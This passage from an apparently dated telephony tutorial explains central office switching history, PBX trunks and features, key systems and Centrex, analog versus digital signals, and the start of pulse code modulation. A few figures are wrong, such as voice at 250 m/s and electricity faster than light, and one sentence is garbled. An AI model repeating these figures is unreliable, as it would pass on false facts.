The solution was to interconnect COs. Then, CO-A routed calls to CO-B
to complete the connection.
Today every CO in the world is connected to every other CO in a vast
communication highway known as the Public Switched Network (PSN). The
PSN goes by a variety of different names:
Dial-up network
Switched network
Exchange network
The CO provides all users (subscribers) with a connection to each other.
A critical note, however, is that no CO has the resources to switch all
their users simultaneously. It would be too expensive and it is
unnecessary to attempt to do so because for the vast majority of the
time, only a small percentage of subscribers are on the phone at the
same time.
If, on a rare occasion, all the circuits are busy, the next call will be
blocked. A call is blocked if there are no circuits available to switch
it because all the circuits are in use.
The term `probability of blocking` is a statistical logarithm which
determines the chance that a call cannot be switched. For modern day
commercial COs, the probability of blocking is very low.
History of COs
Operating switching
In the first COs, a subscriber who wanted to place a call cranked a
magneto-generator to request service from the local phone company. An
operator at the CO monitored subscriber connections by observing lamps
on a switchboard console. When a subscriber's lamp lit, indicating the
request for service, the operator would answer: "Number please...".
The operator connected one call to another by plugging one end of a cord
into the jack of the caller and the other end of the cord into the jack
of the called party, establishing a manual, physical connection.
The switchboard had to have a jack for every incoming and outgoing line
that needed service. The number of lines an operator could monitor was
limited by her arm's reach. Billing was accomplished by the operators
writing up a ticket for each call designating its starting and ending
times.
When telephone subscribers were few in number, this method worked fine.
As the popularity of the phone increased, more phones placed more calls
and it became increasingly unmanageable and expensive to manually switch
and bill each call.
Strowger Step-by-Step Switch
A mechanical switch was invented in the 1890's by a Kansas City
mortician named Almon B. Strowger. He became very suspicious because
callers looking for a mortician were continually referred to his
competition instead to him. When he learned that the local operator was
the wife of his rival, his suspicions were confirmed. He set about to
invent a switching system that would not be dependent upon human
intervention.
His creation, called the Strowger or Step-by-Step switch, was the first
automated electromechanical switching system. It placed switching
control in the hands of the subscriber instead of the operator by adding
a dialing mechanism to the phone.
The Strowger switch completed a call by progressing digit by digit
through two axes of a switching matrix in the CO. A call was stepped
vertically to one of ten levels and rotated horizontally to one of ten
terminals.
It was called step-by-step because calls progress one step at a time as
the customer dialed each digit of the number. When the final digit was
dialed, the switch seized an available circuit and connected the call.
The result of the step-by step switch was to eliminate the need for
manual operator connection and grant privacy and call control to the
subscriber.
The step-by-step switch was a wonderful invention for its day. Today
it is obsolete. Compared to modern day switches, it is slow, noisy
and too expensive to maintain. It is also both bulky and inefficient.
The Crossbar Switch
The crossbar switch was invented and developed in the late 1920s. One
of its main technological advanced was the introduction of a hard wired
memory to store dialed digits until the dialing was complete.
Unlike the step-by-step method, calls are not processed under the
direct control of incoming dial pulses. In the step-by-step method,
each phone call controlled its own pathway through the switching matrix
at the speed the digits were dialed by the user. The crossbar switch
introduced a better method.
Devices called registers stored the digits in memory as they were dialed
by the callers. Not until all the digits were dialed would the call
begin to be switched. Once all the digits were received and stored in
the register, the register handed the digits to a processor to be
examined and used to route the call.
When a pathway had been established and the call was connected, the
register and processor would release and become available to handle
another call. Collectively, this process was called `common control`.
Common control resulted in faster call completion and increased capacity
of the switch. With the old step-by-step, the time it would take a user
to physically dial the digits would occupy valuable switch time because
dialing the digits was the most time consuming part of switching a call.
This 8 to 12 seconds of dialing time prevented other users from
accessing the switching matrix and generally slowed things down.
The genius of the crossbar common control was to store the dialed digits
as they came in and then after the user finished dialing, send the
digits off for processing. The act of dialing no longer kept other
calls waiting for switch resources.
Common control created the separation of the control functions (setting
up and directing the call) from the switching functions (physically
creating the connections).
Crossbar Switching Matrix
Calls were connected by sharing a dedicated wire path through the
switching matrix. Crossbar switches used the intersection of two points
to make a connection. They selected from a horizontal and vertical
matrix of wires, one row connected to one column. The system still
stepped the call through the network, but only after all the digits were
dialed. This method created a more efficient allocation of switch
resources.
There are four important components of a crossbar switch.
. The marker is the brain of a crossbar switch. It identifies a
line requesting service and allocates a register.
. The register provides dial tone and receives and stores the dialed
digits.
. The matrix is a set of horizontal and vertical bars. The point at
which the crosspoints meet establishes the connection.
. A trunk interface unit, also called a sender, processes calls from
a PBX.
Although crossbar is faster and less bulky than step-by-step, it is
still electromechanical and requires a lot of maintenance. It requires
huge amounts of space, generates a lot of heat, and makes a great deal of
noise.
Electronic Switching System (ESS)
The advent of electronic switching (also called stored program
switching) was made possible by the transistor. Introduced in 1965, the
Electronic Switching System (ESS) greatly sped up switch processing
capacity and speed and has done nothing less than revolutionize the
industry.
Modern ESS switches perform five main functions to establish and
maintain service in a public network.
1. Establish a connection between two or more points
2. Provide maintenance and testing services
3. Record and sort customer billing charges
4. Offer customer features, such as call waiting
5. Allow access to operators for special services
An ESS uses computer-based logic to control the same two primary
operations we introduced with the crossbar -- common control and the
switching matrix.
(In an ESS, the terms stored program control, common control, and
electronic switching are all synonymous.)
ESS Common Control
The function of the common control is similar to its function in the
crossbar. The difference is that common control is accomplished
electronically instead of electromechanically. Like the crossbar, one
group of control devices controls the functions of all lines. However,
instead of the hard wired logic of the crossbar, the control device
consists of a computer with memory, storage, and programming capability.
In the ESS, the computer governs the common control. It monitors all
the lines and trunks coming into the CO, searching for changes in the
electrical state of the circuit, such as a phone going off-hook. When a
subscriber goes off- hook and dials a number, the common control
equipment detects the request for service and responds by returning the
dial tone. It then receives, stores, and interprets the dialed digits.
Again, similar to the workings of the crossbar, once the digits have
been processed, the computer establishes a path through the switching
matrix to complete the call. After the connection for the call has been
established, the common control equipment releases and becomes available
to complete other calls.
ESS Switching Matrix
Recall that in the crossbar, calls were connected by sharing a dedicated
wire path through the matrix, establishing a connection between an input
and an output. The matrix in an ESS is logically similar to the
crossbar grid except the pathway is electronic instead of
electromechanical. Called a TDM bus, it is solid state circuitry and is
printed into small computer controlled circuit boards. The computer
controls the connections and path status map to determine which path
should be established to connect the calling and called parties.
Remember
Crossbar switching matrix = maze of physical wire cross connections
ESS switching matrix = electronic multiplexed TDM (time division
multiplexing) bus
ESS Advancements
The unprecedented advancement of the ESS was the speed and processing
power advantage it had over the crossbar because it switched calls
digitally instead of electromechanically. The processing capacity that
would have required a city block of crossbar technology could be
accomplished by one floor of ESS equipment. Much less effort was
required to maintain the ESS because it was smaller and had fewer moving
parts.
Telephone companies would have moved to the new technology for these
advantages alone. But, there was much more to be offered. There was
the power of the computer.
There are major advantages to a computer stored program. It allows the
system to perform functions earlier switches were incapable of. For
example, the switch can collect statistical information to determine its
effectiveness. It can perform self-diagnostics of circuit and system
irregularities and report malfunctions. If trouble occurs, technicians
can address it via a keyboard and terminal. The same terminal, often
called a system managers terminal, allows personnel to perform system
changes and to load new software, eliminating the need for manually
rewiring connections.
The computer uses two types of memory:
. Read Only Memory (ROM) is used to store basic operating
instructions and cannot be altered by the end user. The contents
of this memory can only be changed by the manufacturer.
. Random Access Memory (RAM) stores configuration and database
information. The contents of its memory can be changed by a
system administrator.
Other important functions of the computer include
. Performing telephone billing functions
. Generating traffic analysis reports
. Generating all tones and announcements regarding the status of
circuits and calls
Computer control operates under the direction of software called its
generic program. Periodically updating or adding to the generic program
allows the ESS to be much more flexible and manageable than previous
switch generations because it is the software, not the hardware, that
normally has to be upgraded.
Electronic switching heralded the introduction of new customer features
and services. Credit card calls, last number redial, station transfer,
conference calling, and automatic number identification (ANI) are just
a few examples of unprecedented customer offerings.
The ESS is an almost fail-safe machine. Its design objective is one
hour's outage in 20 years. In today's competitive environment for
higher quality communication equipment, ESS machines provide a level of
service and reliability unachievable in the past.
.-----------------------------------.
2 | The Private Branch Exchange (PBX) |
`-----------------------------------'
The two primary goals of every PBX are to
. facilitate communication in a business
. be cost effective
Organizations that have more than a few phones usually have an internal
switching mechanism that connects the internal phones to each other and
to the outside world.
A PBX is like a miniature Central Office switching system designed for a
private institution. A PBX performs many of the same functions as a CO
does. In fact, some larger institutions use genuine COs as their private
PBX.
Although a PBX and a CO are closely related, there are differences
between them
. A PBX is intended for private operation within a company. A CO is
intended for public service.
. A PBX usually has a console station that greets outside callers
and connects them to internal extensions.
. Most PBXs do not maintain the high level of service protection
that must be maintained in a CO. Assurance features such as
processor redundancy (in the event of processor failure) and
battery backup power, which are standard in a CO, may not be a
part of a PBX.
. COs require a seven digit local telephone number, while PBXs can
be more flexible and create dialing plans to best serve their
users (3, 4 5, or 6 digit extensions).
. A PBX can restrict individual stations or groups of stations from
certain features and services, such as access to outside lines. A
CO usually has no interest in restricting because these features
and services are billed to the customer. COs normally provide
unlimited access to every member on the network.
A PBX is composed of three major elements.
1. Common equipment (a processor and a switching matrix)
2. CO trunks
3. Station lines
Common Equipment
The operation of a PBX parallels the operation of a Central Office ESS.
Its common control is
. A computer operated Central Processing Unit (CPU) running software
that intelligently determines what must be done and how best to do
it.
. A digital multiplexed switching matrix printed on circuit boards
that establishes an interconnection between the calling and called
parties.
The CPU stores operating instructions and a database of information from
which it can make decisions. It constantly monitors all lines for
supervisory and control signals. A switching matrix sets up the
connections between stations or between stations and outgoing trunks.
Housed in equipment cabinets, PBX common equipment is often compact
enough to occupy just a closet or small room. Given the extremely high
rental rates many companies have, a major benefit of a PBX is its small
size.
CO Trunks and Station Lines
A trunk is a communication pathway between switches. A trunk may
provide a pathway between a PBX and the CO or between two PBXs and two
COs. A trunk may be privately owned or be a leased set of lines that
run through the Public Switched Network.
A line is a communication pathway between a switch and terminal
equipment, such as between a PBX and an internal telephone or between a
CO and a home telephone.
The function of the PBX is to interconnect or switch outgoing trunks
with internal lines.
Two Varieties of Lines
Station lines are either analog or digital, depending on the station
equipment it is connecting. If the phone on one desk is digital, it
should be connected to a digital line. If the phone on the desk is
analog, it should be connected to an analog line.
Varieties of Trunks
There exists a wide variety of trunks that can be connected to a PBX for
off-premises communication. Each variety has different functions and
capabilities. It is important to be able to distinguish them.
Tie Trunks
Organizations supporting a network of geographically dispersed PBXs
often use tie trunks to interconnect them. A tie trunk is a permanent
circuit between two PBXs in a private network. Tie trunks are usually
leased from the common carrier; however, a private microwave arrangement
can be established. Usually, leased tie trunks are not charged on a per
call basis but rather on the length of the trunk. If a tie trunk is
used more than one or two hours a day, distance sensitive pricing is
more economical.
A T1 trunk is a digital CO leased trunk that is capable of being
multiplexed into 24 voice or data channels at a total rate of 1.544
Mbps. T1 trunks are used as PBX-to-PBX tie trunks, PBX-to-CO trunks as
well as PBX trunks to bypass the local CO and connect directly to a long
distance carrier. It is a standard for digital transmission in North
America and Japan.
T1 uses two pairs of normal, twisted wire--the same as would be found in
a subscriber's residence. Pulse Code Modulation is the preferred method
of analog to digital conversion.
A T2 trunk is capable of 96 multiplexed channels at a total rate of
6.312 Mbps.
A T3 trunk is capable of 672 multiplexed channels at a total rate of
44.736 Mbps.
A T4 trunk is capable of 4,032 multiplexed channels at a total of
274.176 Mbps.
Direct Inward Dialing (DID) Trunks
Incoming calls to a PBX often first flow through an attendant position.
DID trunks allow users to receive calls directly from the outside
without intervention from the attendant. DID offers three main
advantages.
1. It allows direct access to stations from outside the PBX.
2. It allows users to receive calls even when the attendant
switchboard is closed.
3. It takes a portion of the load off the attendants.
Trunk Pools
Trunks do not terminate at a user's telephone station. Instead trunks
are bundled into groups of similarly configured trunks called trunk
pools. When a user wants to access a trunk, he can dial a trunk access
code--for example, he can dial 9 to obtain a trunk in the pool. Trunk
pools make system administration less complicated because it is easier
to administer a small number of groups than a large number of individual
trunks.
Ports
Ports are the physical and electrical interface between the PBX and a
trunk or station line.
PBX Telephones
Telephone stations in a PBX are not directly connected to the CO but to
the PBX instead. When a station goes off-hook, the PBX recognizes it
and sends to the station its own dial tone. The PBX requires some
access digit, usually "9" to obtain an idle CO trunk from a pool to
connect the station with the public network. This connection between
the telephone and the PBX allows stations to take advantage of a myriad
of PBX features.
The attendant console is a special PBX telephone designed to serve
several functions. Traditionally, most PBXs have used attendants as the
central answering point for incoming calls. Calls placed to the PBX
first connected to the attendant, who answered the company name. The
attendant then established a connection to the desired party. The
attendant also provided assistance to PBX users, including directory
assistance and reports of problems.
In recent years a number of cost-saving improvements have been made to
the attendant console. A feature commonly called automated attendant
can establish connections without a human interface, substantially
decreasing PBX operating costs.
Blocking versus Non-blocking
Blocking is a critical aspect of the functioning of a PBX. A
non-blocking switch is one that provides as many input/output interface
ports as there are lines in the network. In other words, the switching
matrix provides enough paths for all line and trunk ports to be
connected simultaneously.
PBX systems are usually blocking. It requires an exponential increase
in resources and expense to ensure non-blocking. Based on call traffic
studies and the nature of calls, it is generally acceptable to engineer
a low level of blocking in exchange for a major savings of common
equipment resources.
Grades of service are quantitative measurements of blocking. They are
written in the form:
P.xx
where xx is a two digit number that indicates how many calls out of a
hundred will be blocked. The smaller the number, the better the grade
of service.
P.01 means one call out of a hundred will be blocked. It is a better
grade of service than P.05 that block five calls out of a hundred.
Naturally the P.05 service costs less than the better grade of service
provided by P.01.
Even if a PBX's switching matrix is non-blocking, an internal caller may
still not be able to reach an outside trunk if all the trunks are busy.
CO trunks cost money, and very few PBXs dedicate one trunk to every
internal line. Instead, traffic studies are performed to determine the
percentage of time a station will be connected to an outside trunk
during peak hours.
If, for example, it is determined that the average station uses a trunk
only 20% of the time during peak hours, then the switch may be
configured to have a 5:1 line-to-trunk ratio, meaning for every five
lines (or extensions) there is one trunk. Most PBXs are configured on
this principle as a major cost saving method.
PBX Features
COs and PBXs share many of the same attributes and functionality.
However, COs are built to perform different tasks than a PBX, resulting
in feature differences between them. The following is an overview of
common PBX features not found in a CO.
Automatic Route Selection (ARS)
A primary concern of any telecommunications manager is to keep costs
down. One of these costs is long distance service. ARS is a feature
that controls long distance costs.
Most PBXs have more than just public CO trunks connected to them. They
may have a combination of tie trunks to other PBXs (T1/E1 trunks and
many others). Each type of trunk has a separate billing scheme,
relatively more or less expensive for a given number of variables.
It is extremely difficult to attempt to educate company employees on
which trunks to select for which calls at what time of day. It defeats
the productivity-raising, user-transparency goal of any PBX if employees
must pour over tariffing charts every time they want to use the phone.
Instead, ARS programs the PBX central processor to select the least
expensive trunk on a call by call basis. When a user places a call, the
computer determines the most cost effective route, dials the digits and
completes the call.
Feature Access
PBXs support a wide variety of user features. For example, call
forward, hold, and call pickup are all user features. There are two
methods of activating a feature. A code, such as "*62" can be assigned
to the call forward feature. To activate call forward the user presses
"*62" and continues dialing.
Dial codes are not the preferred method of feature access. The problem
is that users tend to forget the codes and either waste time looking
them up or do not take advantage of time saving features, thereby
defeating the purpose of buying them.
Dedicated button feature access is a better solution. Programmable
feature buttons, located on most PBX telephones, are pressed to activate
the desired feature. If a user wants to activate call forward, he
presses a button labeled "call forward" and continues dialing.
The only drawback of telephones with programmable feature buttons is
that they are more expensive than standard phones.
Voice Mail
For a voice conversation to occur, there is one prerequisite so obvious
it is usually overlooked. The called party must be available to answer
the call. In today's busy world, people are often not accessible which
can create a major problem resulting in messages not being received and
business not being conducted.
Statistics confirm the need for an alternate method.
75% of call attempts fail to make contact with the desired party.
50% of business calls involve one-way information--one party
wishing to deliver information to another party without any
response necessary.
50% of incoming calls are less important than the activity they
interrupt.
Voice mail (also known as store and forward technology) is a valuable
feature that is designed around today's busy, mobile office. It is like
a centralized answering machine for all telephone stations in a PBX.
When a telephone is busy or unattended, the systems routes the caller to
a voice announcement that explains that the called party is unavailable
and invites the caller to leave a message. The message is stored until
the station user enters a security dial access code and retrieves the
message.
Automated Attendant
Automated attendant is a feature sometimes included with voice mail. It
allows outside callers to bypass a human attendant by routing their own
calls through the PBX. Callers are greeted with a recorded announcement
that prompts them to dial the extension number of the desired position,
or stay on the line to be connected to an attendant.
Reducing cost is the primary goal of automated attendant. The decreased
attendant work load more d) an pays for the cost of the software and
equipment.
When automated attendant was first introduced, it met with substantial
resistance from the general public. People did not want to talk to a
machine. But, as its cost effectiveness drove many companies to employ
it, the public has slowly adjusted to the new technology.
Restriction
Nearly every PBX enforces some combination of inside and outside calling
restrictions on certain phones. Depending upon the sophistication of
the PBX, a system administrator can have nearly unlimited flexibility in
assigning restrictions. For example, a tire manufacturing plant could
restrict all lobby phones at corporate headquarters to internal and
local calls only. The phones at the storage warehouse could be
restricted for only internal calling. But, all executive phones could
be left unrestricted.
Long distance toll charges can be a crippling expense. Toll fraud is a
major corporate problem. Restriction combats unauthorized use of
company telephone resources and is a prime function of any PBX.
Tandems
As stated earlier, it is necessary to have a switching mechanism to
interconnect calls. If a number of phones all wish to be able to talk
to each other, an enormous amount of cabling would be wasted tying each
of them together. Thus, the switch was born.
The same principle applies for interconnecting PBXs. Large firms that
have PBXs scattered all over the country want each PBX to have the
ability to access every other one. But the expense of directly
connecting each could drive a company out of business. The solution is
to create a centrally located tandem switching station to interconnect
the phones from one PBX with the phones from any other. This solution
creates a Private Switched Network.
Directing digits are often used to inform the tandem switch where to
route the call. Each PBX is assigned a unique number. Let's say a PBX
in Paris is numbered "4." To call the Paris PBX from a PBX in Chicago,
a user would dial "4- XXXX."
Uniform Dialing Plan
A network of PBXs can be configured poorly so that calling an extension
at another PBX could involve dialing a long, confusing series of numbers
and create a lot of user frustration. A Uniform Dialing Plan enables a
caller to dial another internal extension at any PBX on the network with
a minimum of digits, perhaps four or five. The system determines where
to route the call, translates the digits and chooses the best facility,
all without the knowledge of the user. As far as the user knows, the
call could have been placed to a station at the next desk.
Call Accounting System (CAS) and Station Message Detail Recording (SMDR)
CAS works in conjunction with SMDR to identify and monitor telephone
usage in the system. SMDR records call information such as the calling
number, the time of the call, and its duration. The raw data is usually
listed chronologically and can be printed on reports.
SMDR by itself is not particularly useful because the sheer volume and
lack of sorting capability of the reports make them difficult to work
with. A Call Accounting Systems is a database program that addresses
these shortcomings by producing clear, concise management reports
detailing phone usage.
The primary function of CAS reports is to help control and discourage
unnecessary or unauthorized use and to bill back calling charges to
users. Many law firms use a call accounting system to bill individual
clients for every call they make on behalf of each client.
Attendant Features
A number of features are available to improve the efficiency of
attendant consoles.
Here are a few of them.
Direct Station Selection (DSS) allows attendants to call any
station telephone by pressing a button labeled with its extension.
Automatic Timed Reminder alerts the attendant that a station has
not picked up its call. The attendant may choose to reconnect to
the call and attempt to reroute it.
Centralized Attendant Service groups all network attendants into
the same physical location to avoid redundancies of service and
locations.
Power Failure Schemes
If a city or a town experiences a commercial power failure, telephones
connected directly to the CO will not be affected because the CO gets
power from its own internal battery source. A PBX, however, is
susceptible to general power failures because it usually gets its power
from the municipal electric company.
There are several different ways a PBX can be configured to overcome a
power failure.
A PBX can be directly connected to a DC battery which serves as
its source of power. The battery is continually recharged by an
AC line to the electric company. In the event of a power failure,
the PBX will continue functioning until the battery runs out.
A PBX can have an Uninterruptable Power Supply (UPS) to protect
against temporary surges or losses of power.
A PBX can use a Power Failure Transfer (PFT) which, in the event
of a power failure, immediately connects preassigned analog phones
to CO trunks, thereby using power from the CO instead of from the
PBX.
Outgoing Trunk Queuing
In the event all outgoing trunks are busy, this feature allows a user to
dial a Trunk Queuing code and hang up. As soon as a trunk becomes free,
the system reserves it for the user, rings the station and connects the
outside call automatically.
System Management
PBXs can be so large and complex that without a carefully designed
method of system management chaos can result. The best, most advanced
systems mimic CO management features--computer access terminals which
clearly and logically program and control most system features. The
system manager has a wide variety of responsibilities which may include,
but is not limited to
Programming telephone moves, additions, and changes on the system
Performing traffic analysis to maximize system configuration
resources and optimize network performance
Responding to system-generated alarms
Programming telephone, system, attendant, and network features.
ISDN
ISDN is not a product. Rather, it is a series of standards created by
the international body, ITU (previously known as CCITT), to support the
implementation of digital transmission of voice, data, and image through
standard interfaces. Its goal is to combine all communications services
offered over separate networks into a single, standard network. Any
subscriber could gain access to this vast network by simply plugging
into the wall. (At this time not all PBXs are compatible with the ISDN
standard.)
Alternatives to a PBX
There are two main alternatives to purchasing a PBX. They are
purchasing a Key system or renting Centrex service from the local
telephone company.
Key System
Key systems are designed for very small customers, who typically use
under 15 lines. There is no switching mechanism as in a PBX. Instead
every line terminates on every phone. Hence, everyone with a phone can
pick up every incoming call.
Key systems are characterized by a fat cable at the back of each phone.
The cables are fat because each phone is directly connected to each
incoming line and each line has to be wired separately to each phone.
Fat cables have become a drawback to Key systems as building wire
conduits have begun to fill with wire. It has become increasingly
difficult to add and move stations because technicians must physically
rewire the bulky cables instead of simply programming a change in the
software.
Key telephones are equipped with line assignment buttons that light on
incoming calls and flash on held calls. These buttons enable a user to
access each line associated with each button. Unlike a PBX, there is no
need to interface with an attendant console to obtain an outside line.
Differences between Key and PBX Systems
Key systems have no switching matrix. In a Key system, incoming
calls terminate directly on a station user's phone. In a PBX,
incoming calls usually first go to the attendant who switches the
call to the appropriate station.
PBX accesses CO trunk pools by dialing an access code such as "9."
Key systems CO trunks are not pooled. They are accessed directly.
Key systems make use of a limited number of features, many of them
common to the PBX. These include
Last number redial
Speed dialing
Message waiting lamp
Paging
Toll restriction
Today's PBXs can simulate Key system operation. For example, telephones
can have a line directly terminating on a button for direct access.
Centrex
The other alternative to purchasing a PBX is leasing a Centrex service.
Centrex is a group of PBX-like service offerings furnished by the local
telephone company. It offers many of the same features and functions
associated with a PBX, but without the expense of owning and maintaining
equipment and supporting in-house administrative personnel.
Because network control remains the responsibility of the CO, companies
that choose Centrex service over purchasing and maintaining a private
PBX can ignore the sophisticated world of high tech telecommunications
and leave it up to the telephone company representatives.
To provide Centrex service, a pair of wires is extended from the CO to
each user's phone. Centrex provides an "extension" at each station
complete with its own telephone number. No switching equipment is
located at the customer premises. Instead, Centrex equipment is
physically located at the CO.
There are a number of reasons a company would choose a Centrex system
over owning their own PBX. Currently Centrex has six million customers
in the United States market.
Advantages of a Centrex System over a PBX:
Nearly uninterruptable service due to large redundancies in the CO
Easily upgraded to advanced features.
No floor space requirement for equipment.
No capital investment
24-hour maintenance coverage by CO technicians
Inherent Direct Inward Dialing (DID). All lines terminate at
extensions, instead of first flowing through a switchboard.
Call accounting and user billing as inherent part of the service.
Reduced administrative payroll.
Disadvantages of a Centrex System:
Cost. Centrex is tariffed by the local telephone company and can
be very expensive. Companies are charged for each line connected
to the Centrex, as well for the particular service plan chosen.
Additionally, Centrex service may be subject to monthly increases.
Feature availability. Centrex feature options are generally not
state of the art, lagging behind PBX technology. Not all COs are
of the same generation and level of sophistication--a company
associated with an older CO may be subject to inferior service and
limited or outdated feature options.
Control of the network is the responsibility of the CO. While
this release from responsibility is often cited as a positive
feature of Centrex, there are drawback to relinquishing control.
CO bureaucracy can be such that a station move, addition or change
can sometimes take days to achieve. Furthermore, each request is
charged a fee. Also, some companies are more particular about
certain features of their network (security for example) and
require direct control for themselves.
.------------------------------------------.
3 | Properties of Analog and Digital Signals |
`------------------------------------------'
A man in Canada picks up a telephone and dials a number. Within
seconds, he begins talking to his business partner in Madrid. How can
this be?
Telephony is a constantly evolving technology with scientific rules and
standards. You will learn to make sense of what would otherwise seem
impossible.
Voice travels at 250 meters per second and has a range limited to the
strength of the speaker's lungs. In contrast, electricity travels at
speeds approaching the speed of light (310,000 Km per second) and can be
recharged to travel lengths spanning the globe. Obviously, electricity
is a more effective method of transmission.
To capitalize on the transmission properties of electricity, voice is
first converted into electrical impulses and then transmitted. These
electrical impulses represent the varying characteristics that
distinguish all of our voices. The impulses are transmitted at high
speeds and then decoded at the receiving end into a recognizable
duplication of the original voice.
For a hundred years, scientists have been challenged by how best to
represent voice by electrical impulses. An enormous amount of effort
has been devoted to solving this puzzle. The two forms of electrical
signals used to represent voice are analog and digital.
Both analog and digital signals are composed of waveforms. However,
their waveforms have very distinctive properties which distinguish them.
To understand the science of telephony, it is necessary to understand
how analog and digital signals function, and what the differences
between them are.
If you do not possess a fundamental understanding of basic waveforms,
you will not understand many of the more advanced concepts of
telecommunications.
Analog Signal Properties
Air is the medium that carries sound. When we speak to one another, our
vocal chords create a disturbance of the air. This disturbance causes
air molecules to become expanded and compress thus creating waves. This
type of wave is called analog, because it creates a waveform similar to
the sound it represents.
Analog waves are found in nature. They are continually flowing and have
a limitless number of values. The sine wave is a good example of an
analog signal.
Three properties of analog signals are particularly important in
transmission:
amplitude frequency phase
Amplitude
Amplitude refers to the maximum height of an analog signal. Amplitude
is measured in decibels when the signal is measured in the form of
audible sound. Amplitude is measured in volts when the signal is in the
form of electrical energy.
Amplitude of an Analog Wave
Volts represent the instantaneous amount of power an analog signal
contains.
Amplitude, wave height, and loudness of an analog signal represent the
same property of the signal. Decibels and volts are simply two
different units of measurement which are used to quantify this property.
Frequency
Frequency is the number of sound waves or cycles that occur in a given
length of time. A cycle is represented by a 360 degree sine wave.
Frequency is measured in cycles per second, commonly called hertz (Hz).
Frequency corresponds to the pitch (highness or lowness) of a sound. The
higher the frequency, the higher the pitch. The high pitch tone of a
flute will have a higher frequency than the low pitch tone of a bass.
Phase refers to the relative position of a wave at a point in time. It
is useful to compare the phase of two waves that have the same frequency
by determining whether the waves have the same shape or position at the
same time. Waves that are in-step are said to be in phase, and waves
that are not synchronized are called out-of-phase.
Modulation
The reason these three properties are significant is that each can be
changed (modulated) to facilitate transmission.
The term modulation means imposing information on an electrical signal.
The process of modulation begins with a wave of constant amplitude,
frequency, and phase called carrier wave. Information signals
representing voice, data, or video modulate a property (amplitude,
frequency, or phase) of the carrier wave to create a representation of
itself on the wave.
Amplitude Modulation is a method of adding information to an analog
signal by varying its amplitude while keeping its frequency constant. AM
radio is achieved by amplitude modulation.
Frequency Modulation adds information to an analog signal by varying its
frequency while keeping its amplitude constant. FM radio is achieved by
frequency modulation.
Phase Modulation adds information to an analog signal by varying its
phase.
The modulated wave carrying the information is then transmitted to a
distant station where it is decoded and the information is extracted
from the signal.
Properties of Digital Signals
Unlike analog signals, digital signals do not occur in nature. Digital
signals are an invention of mankind. They were created as a method of
coding information. An early example of digital signals is the Morse
Code.
Digital signals have discrete, non-continuous values. Digital signals
have only two states:
Type of Signal State
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Light switch On Off
Voltage Voltage Level 1 Voltage Level 2
(-2 volts) (+2 volts)
Morse Short beat Long beat
Computers and humans cannot communicate directly with each other. We do
not understand what tiny bits and voltage changes mean. Computers do
not understand the letters of the alphabet or words.
For computers and humans to communicate with each other, a variety of
binary (digital) languages, called character codes, have been created.
Each character of a character code represents a unique letter of the
alphabet: a digit, punctuation mark, or printing character.
The most popular character code is call ASCII (America Standard Code for
Information Interchange). It uses a seven bit coding scheme-- each
character consists of a unique combination of seven 1s and 0s. For
example, the capital letter T is represented by the ASCII 1010100; the
number 3 by the ACSII 0110011. The maximum number of different
characters which can be coded in ASCII is 128).
English ASCII
T 1010100
3 0110011
Another character code is called Extended ASCII. Extended ASCII builds
upon the existing ASCII character code. Extended ASCII codes characters
into eight bits providing 256 character representations). The extra 127
characters represent foreign language letters and other useful symbols.
Signal Loss - Attenuation
Analog and digital signals are transmitted to provide communication over
long distances. Unfortunately, the strength of any transmitted signal
weakens over distance. This phenomenon is called attenuation. Both
analog and digital signals are subject to attenuation, but the
attenuation is overcome in very different ways.
Analog Attenuation
Every kilometer or so, an analog signal must be amplified to overcome
natural attenuation. Devices called amplifiers boost all the signals
they receive, strengthening the signals to their original power. The
problem is that over distance, noise is created and it is boosted along
with the desired signal.
The result of using amplifiers is that both the noise (unwanted
electrical energy) and the signal carrying the information are
amplified. Because the noise is amplified every kilometer, it can build
up enough energy to make a conversation incomprehensible. If the noise
becomes too great, communication may become impossible.
Two different types of noise affect signal quality.
White noise is the result of unwanted electrical signals over
lines. When it becomes loud enough, it sounds like the roar of
the ocean at a distance.
Impulse noise is caused by intermittent disturbances such as
telephone company switch activity or lightning. It sounds like
pops and crack over the line.
As analog signals pass through successive amplifiers, the noise is
amplified along with the signal and therefore causes the signal to
degenerate.
Digital Attenuation
Although digital signals are also affected by attenuation, they are
capable of a much more effective method to overcome signal loss. A
device called a regenerative repeater determines whether the incoming
digital signal is a 1 or a 0. The regenerative repeater then recreates
the signal and transmits it at a higher signal strength. This method is
more effective than repeating an analog signal because digital signals
can only be one of two possible states. Remember that an analog signal
is comprised of an infinite number of states.)
The advantage of a digital regenerator is that noise is not reproduced.
At each regenerative repeater, all noise is filtered out-- a major
advantage over analog amplification.
Advantages of Digital over Analog Signals
1. Digital regenerative repeaters are superior to analog amplifiers.
A buildup of noise causes a distortion of the waveform. If the
distortion is large enough, a signal will not arrive in the same
form as it was transmitted. The result is errors in transmission.
In digital transmission, noise is filtered out leaving a clean,
clear signal. A comparison of average error rates shows
Analog: 1 error every 100,000 signals
Digital: 1 error every 10,000,000 signals
2. The explosion of modern digital electronic equipment on the market
has greatly reduced its price, making digital communications
increasingly more cost effective. The price of computer chips,
the brains of electronic equipment, has dropped dramatically in
recent years further reducing the price of digital equipment.
This trend will almost certainly continue adding more pressure to
use digital methods.
3. An ever increasing bulk of communication is between digital
equipment (computer-to-computer)
For most of telephony history, long distance communication meant
voice telephone conversations. Because voice is analog in nature,
it was logical to use analog facilities for transmission. Now the
picture is changing. More and more communication is between
computers, digital faxes, and other digital transmission devices.
Naturally, it is preferable to send digital data over digital
transmission equipment when both sending and receiving devices are
digital since there is no need to convert the digital signals to
analog to prepare them for analog transmission.
Historically, telephone networks were intended to carry analog voice
traffic. Therefore, equipment was designed to create, transmit, and
process analog signals. As technology in computers (microprocessors)
and digital transmission has advanced, nearly all equipment installed in
new facilities are digital.
.---------------------------.
4 | Analog-Digital Conversion |
`---------------------------'
Because it offers better transmission quality, almost every long
distance telephone communication now uses digital transmission on the
majority of their lines. But since voice in its natural form is analog,
it is necessary to convert these. In order to transmit analog waves
over digital facilities to capitalize on its numerous advantages, analog
waves are converted to digital waves.
Pulse Code Modulation (PCM)
The conversion process is called Pulse Code Modulation (PCM) and is
performed by a device called a codec (coder/decoder). PCM is a method
of converting analog signals into digital 1s and 0s, suitable for
digital transmission. At the receiving end of the transmission, the
coded 1s and 0s are reconverted into analog signals which can be
understood by the listener.
Three Step Process of PCM
Step 1 - Sampling
Sampling allows for the recording of the voltage levels at discrete
points in prescribed time intervals along an analog wave. Each voltage
level is called a sample. Nyquist's Theorem states:
If an analog signal is sampled at twice the rate of the highest
